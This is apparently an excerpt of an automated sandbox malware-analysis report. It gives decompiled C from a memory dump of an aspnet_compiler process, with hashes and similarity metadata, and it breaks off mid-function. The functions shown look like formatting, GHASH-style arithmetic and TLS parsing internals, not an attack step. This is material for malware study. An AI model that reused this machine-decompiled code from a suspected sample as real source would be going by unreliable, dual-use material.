                • Instruction Fuzzy Hash: C0D05B30B4421C77E51096859C0AFAB7B9CD701B52F0001A6BA04D72C0D9E15E0087D5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E0043CBCB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _t52;
                				signed int _t54;
                				signed int _t55;
                				void* _t56;
                				signed char _t60;
                				signed char _t62;
                				signed int _t64;
                				void* _t65;
                				signed int _t66;
                				signed char _t75;
                				signed char _t78;
                				void* _t86;
                				void* _t88;
                				signed char _t90;
                				signed char _t92;
                				signed int _t93;
                				signed int _t96;
                				signed int _t98;
                				signed int _t99;
                				signed int _t103;
                				signed int* _t104;
                				void* _t106;
                				signed int _t112;
                				unsigned int _t114;
                				signed char _t116;
                				void* _t124;
                				unsigned int _t125;
                				void* _t126;
                				signed int _t127;
                				short _t128;
                				void* _t131;
                				void* _t133;
                				intOrPtr* _t135;
                				signed int _t136;
                				void* _t137;
                				void* _t139;
                				void* _t140;
                
                				_t126 = __edi;
                				_t52 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t52 ^ _t136;
                				_t135 = __ecx;
                				_t103 = 0;
                				_t124 = 0x41;
                				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
                				_t106 = 0x58;
                				_t139 = _t54 - 0x64;
                				if(_t139 > 0) {
                					__eflags = _t54 - 0x70;
                					if(__eflags > 0) {
                						_t55 = _t54 - 0x73;
                						__eflags = _t55;
                						if(_t55 == 0) {
                							L9:
                							_t56 = E0043D85A(_t135);
                							L10:
                							if(_t56 != 0) {
                								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
                								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
                									L71:
                									L72:
                									return E004338BB(_v8 ^ _t136);
                								}
                								_t125 =  *(_t135 + 0x20);
                								_push(_t126);
                								_v16 = _t103;
                								_t60 = _t125 >> 4;
                								_v12 = _t103;
                								_t127 = 0x20;
                								__eflags = 1 & _t60;
                								if((1 & _t60) == 0) {
                									L46:
                									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
                									__eflags = _t112 - 0x78;
                									if(_t112 == 0x78) {
                										L48:
                										_t62 = _t125 >> 5;
                										__eflags = _t62 & 0x00000001;
                										if((_t62 & 0x00000001) == 0) {
                											L50:
                											__eflags = 0;
                											L51:
                											__eflags = _t112 - 0x61;
                											if(_t112 == 0x61) {
                												L54:
                												_t64 = 1;
                												L55:
                												_t128 = 0x30;
                												__eflags = _t64;
                												if(_t64 != 0) {
                													L57:
                													_t65 = 0x58;
                													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
                													__eflags = _t112 - _t65;
                													if(_t112 == _t65) {
                														L60:
                														_t66 = 1;
                														L61:
                														__eflags = _t66;
                														asm("cbw");
                														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                														_t103 = _t103 + 2;
                														__eflags = _t103;
                														L62:
                														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
                														__eflags = _t125 & 0x0000000c;
                														if((_t125 & 0x0000000c) == 0) {
                															E0043B3AD(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
                															_t137 = _t137 + 0x10;
                														}
                														E0043DDC5(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
                														_t114 =  *(_t135 + 0x20);
                														_t104 = _t135 + 0x18;
                														_t75 = _t114 >> 3;
                														__eflags = _t75 & 0x00000001;
                														if((_t75 & 0x00000001) != 0) {
                															_t116 = _t114 >> 2;
                															__eflags = _t116 & 0x00000001;
                															if((_t116 & 0x00000001) == 0) {
                																E0043B3AD(_t135 + 0x448, 0x30, _t131, _t104);
                																_t137 = _t137 + 0x10;
                															}
                														}
                														E0043DC25(_t135, _t125, 0);
                														__eflags =  *_t104;
                														if( *_t104 >= 0) {
                															_t78 =  *(_t135 + 0x20) >> 2;
                															__eflags = _t78 & 0x00000001;
                															if((_t78 & 0x00000001) != 0) {
                																E0043B3AD(_t135 + 0x448, 0x20, _t131, _t104);
                															}
                														}
                														goto L71;
                													}
                													_t86 = 0x41;
                													__eflags = _t112 - _t86;
                													if(_t112 == _t86) {
                														goto L60;
                													}
                													_t66 = 0;
                													goto L61;
                												}
                												__eflags = _t64;
                												if(_t64 == 0) {
                													goto L62;
                												}
                												goto L57;
                											}
                											_t133 = 0x41;
                											__eflags = _t112 - _t133;
                											if(_t112 == _t133) {
                												goto L54;
                											}
                											_t64 = 0;
                											goto L55;
                										}
                										goto L51;
                									}
                									_t88 = 0x58;
                									__eflags = _t112 - _t88;
                									if(_t112 != _t88) {
                										goto L50;
                									}
                									goto L48;
                								}
                								_t90 = _t125 >> 6;
                								__eflags = 1 & _t90;
                								if((1 & _t90) == 0) {
                									__eflags = 1 & _t125;
                									if((1 & _t125) == 0) {
                										_t92 = _t125 >> 1;
                										__eflags = 1 & _t92;
                										if((1 & _t92) == 0) {
                											goto L46;
                										}
                										_v16 = _t127;
                										L45:
                										_t103 = 1;
                										goto L46;
                									}
                									_push(0x2b);
                									L40:
                									_pop(_t93);
                									_v16 = _t93;
                									goto L45;
                								}
                								_push(0x2d);
                								goto L40;
                							}
                							L11:
                							goto L72;
                						}
                						_t96 = _t55;
                						__eflags = _t96;
                						if(__eflags == 0) {
                							L28:
                							_push(_t103);
                							_push(0xa);
                							L29:
                							_t56 = E0043D5F2(_t135, _t126, __eflags);
                							goto L10;
                						}
                						__eflags = _t96 - 3;
                						if(__eflags != 0) {
                							goto L11;
                						}
                						_push(0);
                						L13:
                						_push(0x10);
                						goto L29;
                					}
                					if(__eflags == 0) {
                						_t56 = E0043D7CF(__ecx);
                						goto L10;
                					}
                					__eflags = _t54 - 0x67;
                					if(_t54 <= 0x67) {
                						L30:
                						_t56 = E0043D358(_t103, _t135);
                						goto L10;
                					}
                					__eflags = _t54 - 0x69;
                					if(_t54 == 0x69) {
                						L27:
                						_t3 = _t135 + 0x20;
                						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
                						__eflags =  *_t3;
                						goto L28;
                					}
                					__eflags = _t54 - 0x6e;
                					if(_t54 == 0x6e) {
                						_t56 = E0043D73C(__ecx, _t124);
                						goto L10;
                					}
                					__eflags = _t54 - 0x6f;
                					if(_t54 != 0x6f) {
                						goto L11;
                					}
                					_t56 = E0043D7B0(__ecx);
                					goto L10;
                				}
                				if(_t139 == 0) {
                					goto L27;
                				}
                				_t140 = _t54 - _t106;
                				if(_t140 > 0) {
                					_t98 = _t54 - 0x5a;
                					__eflags = _t98;
                					if(_t98 == 0) {
                						_t56 = E0043D19B(__ecx);
                						goto L10;
                					}
                					_t99 = _t98 - 7;
                					__eflags = _t99;
                					if(_t99 == 0) {
                						goto L30;
                					}
                					__eflags = _t99;
                					if(__eflags != 0) {
                						goto L11;
                					}
                					L17:
                					_t56 = E0043D55A(_t135, __eflags, _t103);
                					goto L10;
                				}
                				if(_t140 == 0) {
                					_push(1);
                					goto L13;
                				}
                				if(_t54 == _t124) {
                					goto L30;
                				}
                				if(_t54 == 0x43) {
                					goto L17;
                				}
                				if(_t54 <= 0x44) {
                					goto L11;
                				}
                				if(_t54 <= 0x47) {
                					goto L30;
                				}
                				if(_t54 != 0x53) {
                					goto L11;
                				}
                				goto L9;
                			}












































                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 2GBm@
                • API String ID: 0-3202163235
                • Opcode ID: 92687441cf7bbf9bb57ec18a7d9bb2a25548ff4fb32270e1592d7c31f0a6f1be
                • Instruction ID: f11af76f1cab487b4a55bbceaf060dfc582bc565394e8b3492e4159fd7b4cc40
                • Opcode Fuzzy Hash: 92687441cf7bbf9bb57ec18a7d9bb2a25548ff4fb32270e1592d7c31f0a6f1be
                • Instruction Fuzzy Hash: 5961577160070856DE385A2898D6BBF2394EB0D704F24382FF94BFB381D61D9D42875E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E00426351(signed int* __ecx, intOrPtr __edx) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int* _v24;
                				signed int _v28;
                				char _v32;
                				signed int _v36;
                				intOrPtr _v40;
                				signed int _v44;
                				signed int _v48;
                				signed int _v52;
                				signed int _v56;
                				signed int _t76;
                				signed int _t77;
                				signed int _t81;
                				signed int _t85;
                				signed int _t88;
                				signed int _t92;
                				unsigned int _t93;
                				signed int _t98;
                				signed int* _t99;
                				signed int _t101;
                				signed int _t102;
                				signed int _t103;
                				signed int _t109;
                				signed int _t115;
                				signed int _t116;
                				signed int _t118;
                				signed int _t120;
                				signed int _t124;
                
                				_t93 = __ecx[1];
                				asm("xorps xmm0, xmm0");
                				_t120 =  *__ecx;
                				_t76 = 0;
                				_t115 = __ecx[2];
                				asm("movlpd [esp+0x40], xmm0");
                				asm("movlpd [esp+0x38], xmm0");
                				_v48 = _v12;
                				_v40 = __edx;
                				_t101 = __ecx[3];
                				_v24 = __ecx;
                				_v52 = _v16;
                				_v28 = 0;
                				_v44 = _v8;
                				_v56 = _v20;
                				do {
                					_v32 = 0x40;
                					_t109 =  *(_v40 + _t76 * 8);
                					_t77 =  *(_v40 + 4 + _t76 * 8);
                					_t98 = _v44;
                					_v36 = _t77;
                					do {
                						_t124 = _t77;
                						if(_t124 <= 0 && (_t124 < 0 || _t109 < 0)) {
                							_v56 = _v56 ^ _t120;
                							_v52 = _v52 ^ _t93;
                							_v48 = _v48 ^ _t115;
                							_t98 = _t98 ^ _t101;
                						}
                						_t81 = _t120;
                						if((_t115 & 0x00000001) == 0) {
                							_t116 = (_t101 << 0x00000020 | _t115) >> 1;
                							_t102 = _t101 >> 1;
                							if((_t81 & 0x00000001) == 0) {
                								asm("xorps xmm0, xmm0");
                								asm("movlpd [esp+0x38], xmm0");
                								_v44 = _v16;
                								_t85 = _v20;
                							} else {
                								_t85 = 0;
                								_v44 = 0x80000000;
                							}
                							_t101 = _t102 | _v44;
                							_t115 = _t116 | _t85;
                							_t120 = (_t93 << 0x00000020 | _t120) >> 1;
                							_t93 = _t93 >> 1;
                						} else {
                							_t118 = (_t101 << 0x00000020 | _t115) >> 1;
                							_t103 = _t101 >> 1;
                							if((_t81 & 0x00000001) == 0) {
                								asm("xorps xmm0, xmm0");
                								asm("movlpd [esp+0x38], xmm0");
                								_v44 = _v16;
                								_t92 = _v20;
                							} else {
                								_t92 = 0;
                								_v44 = 0x80000000;
                							}
                							_t101 = _t103 | _v44;
                							_t115 = _t118 | _t92;
                							_t120 = (_t93 << 0x00000020 | _t120) >> 0x1 ^ 0x00000000;
                							_t93 = _t93 >> 0x00000001 ^ 0xe1000000;
                						}
                						_t77 = (_v36 << 0x00000020 | _t109) << 1;
                						_t109 = _t109 + _t109;
                						_v36 = _t77;
                						_t63 =  &_v32;
                						 *_t63 = _v32 - 1;
                					} while ( *_t63 != 0);
                					_t76 = _v28 + 1;
                					_v44 = _t98;
                					_v28 = _t76;
                				} while (_t76 < 2);
                				_t99 = _v24;
                				_t88 = _v44;
                				 *_t99 = _v56;
                				_t99[1] = _v52;
                				_t99[2] = _v48;
                				_t99[3] = _t88;
                				return _t88;
                			}



































                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                • Instruction ID: a1de7545f0e247fbbbd07e52f51d14befdf92f863a81e99c98e82dd5492d899e
                • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                • Instruction Fuzzy Hash: AF4108759183558BC340CF29C58061BFBE1FFD8314FA55A1EF889A3350D779E9828B86
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4953faac537a6341995ce638b0f1ad96f44344fc72367eb287e0c4b71f6c8437
                • Instruction ID: 5247a1e75e2c909b3cb5b445d5caba4426badc4340d9fe5689049cae512f9ef4
                • Opcode Fuzzy Hash: 4953faac537a6341995ce638b0f1ad96f44344fc72367eb287e0c4b71f6c8437
                • Instruction Fuzzy Hash: 32325922D26F414DE7639634D8613366248AFB73C5F19C737E81AB5AA6EF2CC4C34105
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E0041DA05(intOrPtr* __ecx, intOrPtr __edx) {
                				void* __edi;
                				signed int _t260;
                				intOrPtr _t262;
                				intOrPtr _t275;
                				signed int _t277;
                				signed char _t282;
                				void* _t284;
                				void* _t290;
                				void* _t293;
                				intOrPtr _t297;
                				void* _t322;
                				signed char _t324;
                				void* _t339;
                				void* _t350;
                				void* _t362;
                				signed char _t370;
                				signed int _t371;
                				intOrPtr _t374;
                				void* _t375;
                				void* _t376;
                				void* _t377;
                				void* _t378;
                				intOrPtr _t380;
                				signed int _t381;
                				intOrPtr _t382;
                				signed short _t385;
                				intOrPtr* _t386;
                				intOrPtr _t387;
                				intOrPtr _t388;
                				intOrPtr _t390;
                				intOrPtr _t393;
                				signed int _t398;
                				signed int _t404;
                				intOrPtr* _t407;
                				signed short _t430;
                				signed int _t445;
                				signed int _t448;
                				intOrPtr _t454;
                				signed int _t458;
                				signed char _t459;
                				intOrPtr _t462;
                				void* _t469;
                				void* _t478;
                				intOrPtr* _t490;
                				signed int _t491;
                				signed int _t493;
                				signed int _t494;
                				intOrPtr _t495;
                				signed int _t496;
                				signed int _t497;
                				signed int _t498;
                				void* _t500;
                				void* _t501;
                				void* _t508;
                
                				 *((intOrPtr*)(_t500 + 0x1c)) = __edx;
                				_t490 = __ecx;
                				 *((intOrPtr*)(_t500 + 0x2c)) = 0;
                				 *((intOrPtr*)(_t500 + 0x28)) = 0;
                				_t491 = 0;
                				 *((char*)(__ecx + 0x320)) = 0;
                				E00435760(__ecx, _t500 + 0x38, 0, 0x28);
                				_t494 =  *(_t500 + 0x6c);
                				_t501 = _t500 + 0xc;
                				 *(_t501 + 0x28) = 0xfffb;
                				_t393 =  *_t494;
                				_t380 = _t393;
                				 *((intOrPtr*)(_t501 + 0x3c)) = _t393;
                				 *((intOrPtr*)(_t501 + 0x40)) = _t380;
                				_t458 = 1;
                				_t260 =  *(_t490 + 0x320) & 0x000000ff;
                				if(_t260 == 0) {
                					_t459 =  *(_t490 + 0x310) & 0x0000ffff;
                					_t495 =  *((intOrPtr*)(_t501 + 0x64));
                					if(_t459 < 0x8000) {
                						L17:
                						_push(0x48);
                						_t262 = E004317CF();
                						 *((intOrPtr*)(_t501 + 0x30)) = _t262;
                						if(_t262 == 0) {
                							L16:
                							_t491 = 0xffffff83;
                							L133:
                							E0041D8A6(_t501 + 0x30);
                							E0041CCD1(_t490);
                							return _t491;
                						}
                						E00435760(_t490, _t262, 0, 0x48);
                						_t381 =  *(_t501 + 0x48);
                						_t501 = _t501 + 0xc;
                						if(_t381 -  *((intOrPtr*)(_t501 + 0x40)) + 3 > _t495) {
                							L10:
                							_t491 = 0xfffffeb8;
                							goto L133;
                						}
                						E0041BFB2(_t381 +  *((intOrPtr*)(_t501 + 0x1c)), _t501 + 0x24);
                						_t398 =  *(_t501 + 0x24);
                						_t382 = _t381 + 3;
                						 *((intOrPtr*)(_t501 + 0x3c)) = _t382;
                						 *(_t501 + 0x18) = _t398;
                						if(_t398 > 0x481e) {
                							goto L10;
                						}
                						_t462 =  *((intOrPtr*)(_t501 + 0x40));
                						if(_t398 - _t462 + _t382 != _t495) {
                							goto L10;
                						}
                						_t496 =  *(_t501 + 0x44);
                						if(_t398 == 0) {
                							L34:
                							 *(_t501 + 0x4c) =  *(_t501 + 0x4c) & 0x00000000;
                							 *(_t501 + 0x48) = _t496;
                							if(_t496 != 0) {
                								L40:
                								 *(_t501 + 0x56) =  *(_t501 + 0x56) &  *(_t501 + 0x28);
                								_t393 = 0x370;
                								_t275 = E004317CF();
                								 *((intOrPtr*)(_t501 + 0x38)) = _t275;
                								if(_t275 == 0) {
                									goto L16;
                								} else {
                									E00435760(_t490, _t275, 0, 0x370);
                									_t501 = _t501 + 0xc;
                									_t458 = 1;
                									 *(_t490 + 0x320) = 1;
                									L42:
                									_t277 =  *(_t501 + 0x48);
                									if(_t277 <= 0) {
                										L63:
                										if(_t491 != 0) {
                											goto L133;
                										}
                										_t494 =  *(_t501 + 0x60);
                										 *(_t490 + 0x320) = 2;
                										L65:
                										_t385 = 1;
                										if( *(_t501 + 0x48) <= 0) {
                											L70:
                											if(( *(_t501 + 0x56) & _t385) == 0 || _t491 == 0) {
                												 *(_t490 + 0x320) = 3;
                												L73:
                												if( *(_t501 + 0x48) <= 0) {
                													L114:
                													if(( *(_t501 + 0x56) & 1) == 0 || _t491 == 0) {
                														 *(_t490 + 0x320) = 4;
                														L117:
                														if( *(_t501 + 0x50) != 0) {
                															_t491 =  ==  ?  *(_t501 + 0x50) : _t491;
                														}
                														_push(_t501 + 0x30);
                														_push(_t491);
                														_t491 = E0041D744( *((intOrPtr*)( *_t490 + 0x50)), _t490);
                														_t282 =  *(_t490 + 0x310) & 0x0000ffff;
                														_t404 = _t282 & 0x00000080;
                														if(_t404 != 0 && (_t491 == 0xfffffe96 || _t491 == 0xfffffe97)) {
                															 *(_t490 + 0x1f8) =  *(_t490 + 0x1f8) & 0x00000000;
                															_t491 = 0;
                														}
                														if(_t491 == 0) {
                															if((_t282 & 0x00000030) == 0x10) {
                																 *((char*)(_t490 + 0x319)) = 5;
                															}
                														} else {
                															if(_t404 == 0) {
                																E0041D6E5(_t490, _t491);
                															}
                															 *(_t490 + 0x1f8) = _t491;
                														}
                														_t284 = E0041C02B(_t490);
                														_t393 =  *((intOrPtr*)(_t501 + 0x3c));
                														if(_t284 != 0) {
                															_t393 = _t393 +  *((intOrPtr*)(_t490 + 0x308));
                															 *((intOrPtr*)(_t501 + 0x3c)) = _t393;
                														}
                														 *(_t490 + 0x320) = 5;
                														L132:
                														 *_t494 = _t393;
                													}
                													goto L133;
                												}
                												_t407 =  *((intOrPtr*)(_t501 + 0x38));
                												if( *((intOrPtr*)(_t407 + 0x36c)) >= 0x80) {
                													if( *((intOrPtr*)(_t490 + 0x22f)) == _t385 && ( *(_t490 + 0x310) & 0x00000030) == 0x10) {
                														_t491 =  ==  ? 0xfffffe7f : _t491;
                													}
                													_t297 =  *((intOrPtr*)(_t490 + 0x230));
                													if(_t297 == _t385 || _t297 == 3 &&  *((char*)(_t490 + 0x233)) == 0) {
                														_t491 =  ==  ? 0xfffffe81 : _t491;
                													}
                												}
                												if(( *(_t407 + 0x36d) & _t385) != 0) {
                													if(( *(_t490 + 0x310) & 0x00000030) != 0x10) {
                														_t491 =  ==  ? 0xfffffe7e : _t491;
                													} else {
                														if(( *(_t407 + 0x31c) & 0x00000003) == 0) {
                															_t491 = 0xfffffe7e;
                														}
                													}
                												}
                												if(( *(_t501 + 0x56) & _t385) == 0) {
                													 *(_t490 + 0x312) =  *(_t490 + 0x312) | 0x00002000;
                													if(( *(_t490 + 0x310) & 0x00000080) == 0) {
                														_t291 =  *((intOrPtr*)(_t490 + 0x100));
                														if( *((intOrPtr*)(_t490 + 0x100)) != 0) {
                															if( *((intOrPtr*)(_t407 + 0x24)) == 0) {
                																E0041D5DD( *((intOrPtr*)(_t407 + 0x7c)), _t291);
                																_t491 =  ==  ? 0xfffffebe : _t491;
                																_t407 =  *((intOrPtr*)(_t501 + 0x38));
                															} else {
                																_push(_t407);
                																_t293 = E0041D68F(_t291);
                																_t407 =  *((intOrPtr*)(_t501 + 0x38));
                																if(_t293 != _t385) {
                																	_t491 = 0xfffffebe;
                																}
                															}
                														}
                													}
                													if( *((intOrPtr*)(_t407 + 0x1c)) != 0x206) {
                														goto L114;
                													} else {
                														 *(_t501 + 0x60) =  *(_t501 + 0x60) & 0x00000000;
                														_t386 = _t490 + 0x384;
                														if( *_t386 != 0) {
                															if( *((char*)(_t490 + 0x38a)) == 0) {
                																L107:
                																if(E00429F0D( *_t407, _t501 + 0x64,  *_t386,  *((intOrPtr*)(_t407 + 4))) != 0) {
                																	L109:
                																	_t491 = 0xfffffeaa;
                																	L110:
                																	if(_t491 == 0 &&  *((char*)(_t490 + 0x38a)) != 0 && ( *(_t490 + 0x310) & 0x00000080) == 0) {
                																		E0042D8ED( *_t386);
                																		_t491 =  <  ? 0xfffffe66 : _t491;
                																	}
                																	goto L114;
                																}
                																 *((char*)(_t490 + 0x38a)) = 1;
                																goto L110;
                															}
                															_t290 = E0041CCB2(_t490,  *_t386);
                															 *((char*)(_t490 + 0x38a)) = 0;
                															L105:
                															if(_t290 != 0) {
                																goto L109;
                															}
                															_t407 =  *((intOrPtr*)(_t501 + 0x38));
                															goto L107;
                														}
                														_push(_t386);
                														_t469 = 0x25;
                														_t290 = E0041CC29(_t490, _t469);
                														goto L105;
                													}
                												} else {
                													 *(_t490 + 0x1f8) = _t491;
                													goto L133;
                												}
                											} else {
                												goto L133;
                											}
                										}
                										 *(_t501 + 0x4c) =  *(_t501 + 0x4c) & 0x00000000;
                										_push(_t501 + 0x20);
                										_push(_t501 + 0x30);
                										_push( !(( *(_t490 + 0x310) & 0x0000ffff) >> 7) & 1);
                										_push(_t393);
                										_t491 = E0041D8F4(_t501 + 0x38);
                										_t501 = _t501 + 0x10;
                										if(_t491 != 0) {
                											if(_t491 == 0xffffff74 || _t491 == 0xffffff7c ||  *((intOrPtr*)(_t490 + 0x80)) == 0) {
                												L69:
                												 *(_t501 + 0x56) =  *(_t501 + 0x56) | _t385;
                											} else {
                												 *(_t501 + 0x56) =  *(_t501 + 0x56) ^ ( *(_t501 + 0x56) >> 0x00000001 ^  *(_t501 + 0x56)) & 1;
                											}
                											goto L70;
                										}
                										if(( *(_t501 + 0x56) & 0x00000002) == 0) {
                											 *(_t501 + 0x56) =  *(_t501 + 0x56) & 0x0000fffe;
                											goto L70;
                										}
                										_t491 =  *(_t501 + 0x50);
                										goto L69;
                									}
                									while(_t277 > _t458) {
                										 *(_t501 + 0x4c) =  *(_t501 + 0x48) - 1;
                										_push(_t501 + 0x20);
                										_push(_t501 + 0x30);
                										_push( !(( *(_t490 + 0x310) & 0x0000ffff) >> 7) & _t458);
                										_push(_t393);
                										_t322 = E0041D8F4(_t501 + 0x38);
                										_t501 = _t501 + 0x10;
                										if(_t322 == 0) {
                											_t322 = E0041D9CD(_t490, _t501 + 0x30);
                										}
                										_push(_t501 + 0x30);
                										_push(_t322);
                										_t491 = E0041D744( *((intOrPtr*)( *_t490 + 0x50)), _t490);
                										_t324 = 0x80;
                										_t430 =  *(_t490 + 0x310) & 0x00000080;
                										if(_t430 != 0 && (_t491 == 0xfffffe96 || _t491 == 0xfffffe97)) {
                											 *(_t490 + 0x1f8) =  *(_t490 + 0x1f8) & 0x00000000;
                											_t491 = 0;
                										}
                										if(_t491 != 0) {
                											L57:
                											if(( *(_t490 + 0x310) & _t324) == 0) {
                												E0041D6E5(_t490, _t491);
                											}
                											 *(_t490 + 0x1f8) = _t491;
                											if( *(_t501 + 0x50) == 0) {
                												 *(_t501 + 0x50) = _t491;
                												_t491 = 0;
                											}
                											goto L61;
                										} else {
                											if(( *( *((intOrPtr*)(_t501 + 0x38)) + 0x36c) & 0x00000010) == 0 || _t430 != 0) {
                												L61:
                												_t393 =  *((intOrPtr*)(_t501 + 0x38));
                												E0042774D(_t393);
                												 *(_t501 + 0x56) =  *(_t501 + 0x56) &  *(_t501 + 0x28);
                												_t277 =  *(_t501 + 0x48) - 1;
                												_t458 = 1;
                												 *(_t501 + 0x48) = _t277;
                												continue;
                											} else {
                												_t387 =  *((intOrPtr*)(_t501 + 0x30));
                												_t497 =  *(_t501 + 0x4c);
                												if( *(_t501 + 0x20) != _t491) {
                													goto L61;
                												}
                												 *(_t501 + 0x20) =  *(_t501 + 0x20) & _t491;
                												_t491 = E00429B79( *((intOrPtr*)(_t387 + 4 + _t497 * 8)), 5,  *((intOrPtr*)(_t490 + 0x84)));
                												if(_t491 < 0) {
                													goto L133;
                												}
                												E004351E0( *( *(_t501 + 0x20)),  *((intOrPtr*)(_t387 + _t497 * 8)),  *((intOrPtr*)(_t387 + 4 + _t497 * 8)));
                												_t478 = _t501 + 0x28;
                												_t501 = _t501 + 0xc;
                												_push(0);
                												_push(2);
                												_t491 =  ==  ? 0 : E0041FC23( *((intOrPtr*)( *_t490 + 0x50)), _t478);
                												if(_t491 == 0) {
                													goto L61;
                												}
                												_t324 = 0x80;
                												goto L57;
                											}
                										}
                									}
                									goto L63;
                								}
                							}
                							if(( *(_t490 + 0x314) & 0x00002000) != 0) {
                								L38:
                								if(( *(_t490 + 0x310) & 0x00000030) == 0) {
                									_t491 = 0xfffffea7;
                									E0041D6E5(_t490, 0xfffffea7);
                								}
                								goto L40;
                							}
                							if(( *(_t490 + 0x310) & 0x00000100) == 0) {
                								goto L40;
                							}
                							_t339 = E0041C012( *(_t490 + 0x220) & 0x0000ffff);
                							_t501 = _t501 + 4;
                							if(_t339 == 0) {
                								goto L40;
                							}
                							goto L38;
                						}
                						L22:
                						L22:
                						if(_t496 >= ( *(_t490 + 0x216) & 0x000000ff) || _t496 >= 9) {
                							_t491 = 0xfffffe90;
                						} else {
                							goto L24;
                						}
                						goto L133;
                						L24:
                						if(_t382 - _t462 + 3 >  *((intOrPtr*)(_t501 + 0x64))) {
                							goto L10;
                						}
                						E0041BFB2(_t382 +  *((intOrPtr*)(_t501 + 0x1c)), _t501 + 0x24);
                						_t445 =  *(_t501 + 0x24);
                						_t388 = _t382 + 3;
                						 *((intOrPtr*)(_t501 + 0x3c)) = _t388;
                						if(_t445 -  *((intOrPtr*)(_t501 + 0x40)) + _t388 >  *((intOrPtr*)(_t501 + 0x64))) {
                							goto L10;
                						}
                						 *( *((intOrPtr*)(_t501 + 0x30)) + 4 + _t496 * 8) = _t445;
                						_t498 =  *(_t501 + 0x20);
                						 *((intOrPtr*)( *((intOrPtr*)(_t501 + 0x34)) +  *(_t501 + 0x48) * 8)) =  *((intOrPtr*)(_t501 + 0x40)) + _t498;
                						_t382 =  *((intOrPtr*)(_t501 + 0x40)) +  *(_t501 + 0x28);
                						_t350 = 0xfffffffd;
                						_t448 =  *((intOrPtr*)(_t501 + 0x1c)) + _t350 -  *(_t501 + 0x24);
                						 *((intOrPtr*)(_t501 + 0x3c)) = _t382;
                						 *(_t501 + 0x18) = _t448;
                						if( *(_t490 + 0x310) < 0x8000) {
                							L31:
                							_t496 =  *(_t501 + 0x44) + 1;
                							 *(_t501 + 0x44) = _t496;
                							if(_t448 == 0) {
                								goto L34;
                							} else {
                								_t462 =  *((intOrPtr*)(_t501 + 0x40));
                								goto L22;
                							}
                						}
                						if(_t382 -  *((intOrPtr*)(_t501 + 0x40)) + 2 >  *((intOrPtr*)(_t501 + 0x64))) {
                							goto L10;
                						}
                						E0041BFCC(_t382 + _t498, _t501 + 0x14);
                						_t493 =  *(_t501 + 0x14) & 0x0000ffff;
                						_t390 = _t382 + 2;
                						 *((intOrPtr*)(_t501 + 0x3c)) = _t390;
                						if(_t493 -  *((intOrPtr*)(_t501 + 0x40)) + _t390 >  *((intOrPtr*)(_t501 + 0x64))) {
                							goto L10;
                						}
                						 *( *((intOrPtr*)(_t501 + 0x34)) + 4 +  *(_t501 + 0x44) * 8) = _t493;
                						 *((intOrPtr*)( *((intOrPtr*)(_t501 + 0x38)) +  *(_t501 + 0x48) * 8)) =  *((intOrPtr*)(_t501 + 0x40)) + _t498;
                						 *((intOrPtr*)(_t501 + 0x40)) =  *((intOrPtr*)(_t501 + 0x40)) + _t493;
                						_t362 = 0xfffffffe;
                						 *(_t501 + 0x18) =  *(_t501 + 0x18) + _t362 - _t493;
                						_t491 = E004227B4(_t490,  *((intOrPtr*)( *((intOrPtr*)(_t501 + 0x38)) +  *(_t501 + 0x48) * 8)), _t508,  *( *((intOrPtr*)(_t501 + 0x38)) + 4 +  *(_t501 + 0x48) * 8) & 0x0000ffff, 0xb, 0);
                						_t501 = _t501 + 0xc;
                						if(_t491 < 0) {
                							goto L133;
                						} else {
                							_t382 =  *((intOrPtr*)(_t501 + 0x3c));
                							_t448 =  *(_t501 + 0x18);
                							goto L31;
                						}
                					}
                					if(_t393 - _t380 + 1 <= _t495) {
                						_t370 =  *((intOrPtr*)(_t393 +  *((intOrPtr*)(_t501 + 0x1c))));
                						_t454 = _t393 + 1;
                						 *(_t501 + 0x14) = _t370;
                						_t371 = _t370 & 0x000000ff;
                						 *(_t501 + 0x24) = _t371;
                						 *((intOrPtr*)(_t501 + 0x3c)) = _t454;
                						if(_t371 - _t380 + _t454 > _t495) {
                							goto L10;
                						}
                						if((_t459 & 0x00000030) != 0x10 ||  *(_t501 + 0x14) == 0) {
